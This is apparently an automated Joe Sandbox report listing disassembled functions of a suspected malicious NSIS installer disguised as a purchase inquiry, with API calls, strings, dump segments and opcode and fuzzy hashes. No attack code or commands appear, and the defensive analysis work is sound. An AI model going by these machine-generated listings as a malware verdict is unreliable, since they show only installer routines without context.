                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                    • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                                                    • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                                    • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                    • MulDiv.KERNEL32(0005D90C,00000064,0005F160), ref: 00402D4D
                                                                    • wsprintfW.USER32 ref: 00402D5D
                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 00402D57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: verifying installer: %d%%
                                                                    • API String ID: 1451636040-82062127
                                                                    • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                    • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                                                    • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                                    • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID: `7~v0}
                                                                    • API String ID: 1849352358-2153329232
                                                                    • Opcode ID: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                                                    • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                                    • Opcode Fuzzy Hash: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                                                    • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                                    APIs
                                                                    • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                      • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106959059885.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.106959018081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959096492.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959124482.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                    • String ID:
                                                                    • API String ID: 4216380887-0
                                                                    • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                    • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                    • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                    • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                    APIs
                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                    • GlobalFree.KERNEL32(?), ref: 10002572
                                                                    • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106959059885.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.106959018081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959096492.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959124482.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc
                                                                    • String ID:
                                                                    • API String ID: 1780285237-0
                                                                    • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                    • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                    • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                    • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: 717dcf576c097408dac1e53f9241d150a48d45124f8545d76f83d87da111a921
                                                                    • Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
                                                                    • Opcode Fuzzy Hash: 717dcf576c097408dac1e53f9241d150a48d45124f8545d76f83d87da111a921
                                                                    • Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                    • wsprintfW.USER32 ref: 004049DF
                                                                    • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s$&B
                                                                    • API String ID: 3540041739-2907463167
                                                                    • Opcode ID: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                    • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                                    • Opcode Fuzzy Hash: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                                    • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !$`7~v0}
                                                                    • API String ID: 1777923405-1519858653
                                                                    • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                    • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                                    • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                    • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp$C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll
                                                                    • API String ID: 3109718747-144038034
                                                                    • Opcode ID: 898ad0bae67aa0cafadd02eb43276105c6784b8f21917b3b2fbdcc81fafd316f
                                                                    • Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
                                                                    • Opcode Fuzzy Hash: 898ad0bae67aa0cafadd02eb43276105c6784b8f21917b3b2fbdcc81fafd316f
                                                                    • Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                    • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106959059885.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.106959018081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959096492.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959124482.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                    • String ID:
                                                                    • API String ID: 1148316912-0
                                                                    • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                    • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                    • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                    • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                    • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                                    • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                                                    • Opcode Fuzzy Hash: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                                    • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
                                                                    • lstrcatW.KERNEL32(?,00409014), ref: 004059F0
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-3355392842
                                                                    • Opcode ID: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                                    • Instruction ID: 0310c51cfe5e9f7ce5f17852bd92726e60929743d8abc3d3bdfc5d6511664db2
                                                                    • Opcode Fuzzy Hash: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                                    • Instruction Fuzzy Hash: C0D0A731111530ABC211AB488D04DDF739C9E463453424037F101B31A1D7785D5197FE
                                                                    APIs
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                      • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                      • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,00403160), ref: 004051D4
                                                                      • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll), ref: 004051E6
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                      • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                      • Part of subcall function 004056FA: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                      • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
